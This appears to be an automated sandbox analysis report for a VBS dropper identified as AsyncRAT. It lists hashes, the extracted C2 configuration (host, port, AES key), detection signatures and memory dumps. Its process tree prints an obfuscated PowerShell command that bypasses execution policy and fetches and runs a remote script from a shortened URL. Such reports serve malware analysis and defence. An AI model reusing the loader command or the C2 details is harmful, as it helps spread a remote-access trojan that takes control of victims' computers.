Analysis
-
max time kernel
68s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
24-07-2021 06:52
General
-
Target
KHTC288.vbs
-
Size
662B
-
MD5
896c2bbb0dda248ac02ed60683858fa5
-
SHA1
42e44987ae2d842f4e6d197bde7694d18d1dc57a
-
SHA256
df8d5648e265825d946b6a3cffe442a39d04570bbe8834cfd54e2aa568fb4520
-
SHA512
090bf4471502c608a3226a02efca77c4e31b345e505c6bee21d5e12b25043a45ec71daca3a73ac81523429dab2f400d3358f40bae7e2523272d7bfa762b06c81
Score
10/10
Malware Config
Extracted
Family
asyncrat
Version
0.5.7B
C2
fat7eorami.ddns.net:1177
Mutex
AsyncMutex_6SI8OkPnk
Attributes
-
aes_key
G2WOlk5vwHneijb61ynCU3xRR3D20hZw
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
omarf2r
-
host
fat7eorami.ddns.net
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
1177
-
version
0.5.7B
aes.plain
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
-
Async RAT payload 2 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KHTC288.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3wZ38ji'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\ToT.ps13⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\ToT.ps1MD5
ae87ac57338d18d8d6a1e91bb24b9834
SHA1feeb1bdad90399c41e97d329a3d007f7fec6ab58
SHA256c098aae184b0d20e79b0e7e92bf5722d0febf1949972af6426c8f915dd1d73c1
SHA512095577ca3789215f73c3817e21bdc00b9484111f613c6d97582b365d09faf228156f7d1703496984aee44d55fe5513ab18860002f4e537495b34ea7f4635baa2
-
memory/516-364-0x0000000005930000-0x0000000005931000-memory.dmpFilesize
4KB
-
memory/516-368-0x0000000006920000-0x0000000006921000-memory.dmpFilesize
4KB
-
memory/516-351-0x000000000040C73E-mapping.dmp
-
memory/516-361-0x0000000002C20000-0x0000000002C21000-memory.dmpFilesize
4KB
-
memory/516-371-0x0000000006E70000-0x0000000006EC9000-memory.dmpFilesize
356KB
-
memory/516-370-0x0000000006CE0000-0x0000000006D6D000-memory.dmpFilesize
564KB
-
memory/516-369-0x0000000006890000-0x0000000006894000-memory.dmpFilesize
16KB
-
memory/516-362-0x0000000005890000-0x0000000005891000-memory.dmpFilesize
4KB
-
memory/516-367-0x0000000006820000-0x0000000006821000-memory.dmpFilesize
4KB
-
memory/516-366-0x00000000066B0000-0x0000000006729000-memory.dmpFilesize
484KB
-
memory/516-365-0x0000000006730000-0x0000000006731000-memory.dmpFilesize
4KB
-
memory/516-350-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/516-372-0x0000000006ED0000-0x0000000006ED1000-memory.dmpFilesize
4KB
-
memory/516-363-0x0000000005E30000-0x0000000005E31000-memory.dmpFilesize
4KB
-
memory/3244-123-0x0000020F01F83000-0x0000020F01F85000-memory.dmpFilesize
8KB
-
memory/3244-124-0x0000020F1A180000-0x0000020F1A181000-memory.dmpFilesize
4KB
-
memory/3244-121-0x0000020F01F80000-0x0000020F01F82000-memory.dmpFilesize
8KB
-
memory/3244-114-0x0000000000000000-mapping.dmp
-
memory/3244-119-0x0000020F19FD0000-0x0000020F19FD1000-memory.dmpFilesize
4KB
-
memory/3244-307-0x0000020F01F86000-0x0000020F01F88000-memory.dmpFilesize
8KB
-
memory/3272-349-0x000001E1759B0000-0x000001E1759BE000-memory.dmpFilesize
56KB
-
memory/3272-332-0x000001E1759C0000-0x000001E1759C1000-memory.dmpFilesize
4KB
-
memory/3272-322-0x000001E15D100000-0x000001E15D102000-memory.dmpFilesize
8KB
-
memory/3272-324-0x000001E15D103000-0x000001E15D105000-memory.dmpFilesize
8KB
-
memory/3272-308-0x0000000000000000-mapping.dmp
-
memory/3272-356-0x000001E15D106000-0x000001E15D108000-memory.dmpFilesize
8KB